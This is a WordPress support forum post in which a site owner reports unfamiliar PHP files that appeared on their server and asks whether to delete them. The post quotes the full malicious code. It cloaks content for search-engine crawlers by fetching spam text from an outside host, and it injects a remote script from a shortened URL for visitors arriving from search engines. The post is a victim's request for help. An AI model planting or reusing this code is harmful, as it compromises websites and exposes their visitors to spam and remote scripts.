Many strange php files
-
Hi guys, I’ve found many strange php files in the WP directory, such as barn.php, tern.php, tium.php and many more. These seem to have been added between April 1st and 4th. There is a strange code:
<?php function gethttpcnt($url,$timeout = 5){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $cnt = curl_exec($ch); curl_close($ch); return $cnt;} $houzui=stripslashes($_SERVER['QUERY_STRING']); if($houzui==''){ $ncontent=gethttpcnt("http://www.jptop.cc/hy/zt/0404/101wh.com/list.txt"); $newcontent=explode("||",$ncontent); $content=gethttpcnt($newcontent[0]); if(stristr($_SERVER['HTTP_USER_AGENT'],'Googlebot')||stristr($_SERVER['HTTP_USER_AGENT'],'yahoo')||stristr($_SERVER['HTTP_USER_AGENT'],'bingbot')||stristr($_SERVER['HTTP_USER_AGENT'],'msnbot')||stristr($_SERVER['HTTP_USER_AGENT'],'aol')){ echo $content;} }else{ $nhouzui=explode(".",$houzui); $nmulu=explode("_",$nhouzui[0]); $content=gethttpcnt("http://www.jptop.cc/hy/zt/0404/101wh.com/".$nmulu[0]."/".$nmulu[1].'.txt'); if(stristr($_SERVER['HTTP_USER_AGENT'],'Googlebot')||stristr($_SERVER['HTTP_USER_AGENT'],'yahoo')||stristr($_SERVER['HTTP_USER_AGENT'],'bingbot')||stristr($_SERVER['HTTP_USER_AGENT'],'msnbot')||stristr($_SERVER['HTTP_USER_AGENT'],'aol')){ echo $content;}} if(stristr($_SERVER['HTTP_REFERER'],"google")||stristr($_SERVER['HTTP_REFERER'],"yahoo")||stristr($_SERVER['HTTP_REFERER'],"bing")||stristr($_SERVER['HTTP_REFERER'],"msn")||stristr($_SERVER['HTTP_REFERER'],"aol")){ $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4); if (preg_match("/zh-c/i", $lang)==false||preg_match("/zh-c/i", $lang)==0){ echo "<script type='text/javascript' src='http://bit.ly/1s9BoaN'></script></html>"; } } ?>Should I delete them?
Thanks.
-mbg
Viewing 4 replies - 1 through 4 (of 4 total)
Viewing 4 replies - 1 through 4 (of 4 total)
The topic ‘Many strange php files’ is closed to new replies.
